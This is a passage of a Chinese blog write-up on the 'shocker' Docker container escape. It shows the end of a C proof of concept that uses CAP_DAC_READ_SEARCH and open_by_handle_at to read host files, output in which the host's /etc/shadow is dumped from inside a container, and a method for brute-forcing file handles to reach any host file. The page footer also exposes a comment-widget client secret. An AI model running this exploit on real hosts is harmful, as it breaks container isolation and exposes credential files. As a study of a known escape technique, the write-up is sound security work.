class="number">0x00</span>, <span class="number">0xc6</span>, <span class="number">0xfd</span>, <span class="number">0xc8</span>,<span class="number">0x4d</span>&#125;;</span><br><span class="line">	<span class="keyword">int</span> fd_hosts,fd_host_shadow;</span><br><span class="line">	fhp = <span class="built_in">malloc</span>(<span class="keyword">sizeof</span>(struct file_handle) + handle_bytes);</span><br><span class="line">	fhp-&gt;handle_bytes = handle_bytes;</span><br><span class="line">	fhp-&gt;handle_type = <span class="number">1</span>;</span><br><span class="line">	<span class="built_in">memcpy</span>(fhp-&gt;f_handle,f_handle,<span class="number">8</span>);</span><br><span class="line">	<span class="keyword">if</span> ((fd_hosts = open(<span class="string">&quot;/etc/hosts&quot;</span>, O_RDONLY)) &lt; <span class="number">0</span>)</span><br><span class="line">		die(<span class="string">&quot;[-] open&quot;</span>);</span><br><span class="line">	fd_host_shadow = open_by_handle_at(fd_hosts, fhp, O_RDONLY);</span><br><span class="line">	<span class="keyword">if</span>(fd_host_shadow &lt; <span class="number">0</span>)&#123;</span><br><span class="line">		die(<span class="string">&quot;[-] open host shadow&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="built_in">memset</span>(read_buf,<span class="number">0</span>,<span class="keyword">sizeof</span>(read_buf));</span><br><span class="line">	<span class="keyword">if</span> (read(fd_host_shadow, read_buf, <span class="keyword">sizeof</span>(read_buf) - <span class="number">1</span>) &lt; <span class="number">0</span>)</span><br><span class="line">		die(<span class="string">&quot;[-] read&quot;</span>);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;fd_host_shadow file content is \n%s &quot;</span>,read_buf);</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>执行结果如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> docker run -it --cap-add CAP_DAC_READ_SEARCH ubuntu /bin/sh</span></span><br><span class="line"><span class="meta">$</span><span class="bash"> ./poc</span></span><br><span class="line">fd_host_shadow file content is</span><br><span class="line">root:*:18575:0:99999:7:::</span><br><span class="line">daemon:*:18575:0:99999:7:::</span><br><span class="line">bin:*:18575:0:99999:7:::</span><br><span class="line">sys:*:18575:0:99999:7:::</span><br><span class="line">sync:*:18575:0:99999:7:::</span><br><span class="line">games:*:18575:0:99999:7:::</span><br><span class="line">man:*:18575:0:99999:7:::</span><br><span class="line">lp:*:18575:0:99999:7:::</span><br><span class="line">mail:*:18575:0:99999:7:::</span><br><span class="line">news:*:18575:0:99999:7:::</span><br><span class="line">uucp:*:18575:0:99999:7:</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>根据上面的poc可以知道，如果知道<code>file_handle</code>的<code>f_handle</code>成员（<code>inodeid</code>+4个未知字节），即能获取到宿主机的文件。而在宿主机中，根目录 <code>/</code>的inodeid一般为2，剩下的4个字节为0。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> ./t_name_to_handle_at /</span></span><br><span class="line">26</span><br><span class="line">8 1    02 00 00 00 00 00 00 00</span><br></pre></td></tr></table></figure>

<p>所以可以先获取根目录的文件描述符，然后读取根目录下的二级目录的inodeid和二级目录名称，匹配需要读取文件的二级目录并拿到inodeid，剩下4个未知的字节直接爆破，进而拿到二级目录的文件描述符。然后继续以同样的方式进行读取。</p>
<img src="/img/image-20210713190546925.png" alt="shocker攻击读取/etc/shadow的流程" style="zoom:50%;" />

<h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><p><a target="_blank" rel="noopener" href="https://github.com/gabrtv/shocker/blob/master/shocker.c">https://github.com/gabrtv/shocker/blob/master/shocker.c</a></p>
<p><a target="_blank" rel="noopener" href="https://developer.aliyun.com/article/57803">https://developer.aliyun.com/article/57803</a></p>
<p><a target="_blank" rel="noopener" href="https://man7.org/linux/man-pages/man2/open_by_handle_at.2.html">https://man7.org/linux/man-pages/man2/open_by_handle_at.2.html</a></p>
<p><a target="_blank" rel="noopener" href="https://man7.org/linux/man-pages/man7/capabilities.7.html">https://man7.org/linux/man-pages/man7/capabilities.7.html</a></p>
</div><div class="addthis_inline_share_toolbox"></div><script src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-60e283a1440f1127" defer></script></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2021/07/05/Docker-Remote-API-%E6%9C%AA%E6%8E%88%E6%9D%83/"><span class="level-item">Docker Remote API 未授权</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">Comments</h3><div id="comment-container"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.css"><script src="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.min.js"></script><script>var gitalk = new Gitalk({
            id: "cc4ec4cf8c335c7fde5eb811f95b2e46",
            repo: "foyjog.github.io",
            owner: "foyjog",
            clientID: "83a82418e0e8f81586a1",
            clientSecret: "48497135c33502036fceb019e93330832c06fbd9",
            admin: ["foyjog"],
            createIssueManually: false,
            distractionFreeMode: false,
            perPage: 20,
            pagerDirection: "last",
            
            
            enableHotKey: true,
            language: "zh-CN",
        })
        gitalk.render('comment-container')</script></div></div></div><!--!--><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">foyjog blog</a><p class="is-size-7"><span>&copy; 2021 foyjog</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p></div><div class="level-end"></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "This website uses cookies to improve your experience.",
          dismiss: "Got it!",
          allow: "Allow cookies",
          deny: "Decline",
          link: "Learn more",
          policy: "Cookie Policy",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script></body></html>